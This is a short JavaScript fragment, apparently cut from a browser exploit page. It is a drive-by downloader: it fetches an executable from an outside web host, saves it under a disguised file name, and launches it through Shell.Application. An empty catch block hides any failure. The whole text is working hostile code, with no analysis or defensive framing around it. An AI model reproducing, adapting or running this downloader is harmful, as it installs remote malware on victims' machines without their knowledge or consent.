try{

var xml=ado.CreateObject("Microsoft.XMLHTTP","");

xml.Open("GET","http://www.xinxingzhongxue.com/mm/xz.exe",0);

xml.Send();

as.type=1;

as.open();

as.write(xml.responseBody);

path="..\\ntuser.com";

as.savetofile(path,2);

as.close();

var ddfdfe='rdFdfdfFdFF';

var Shell=ado.createobject("Shell.Application","");

Shell["ShellExecute"](path,"","open")

} catch(e){


} 


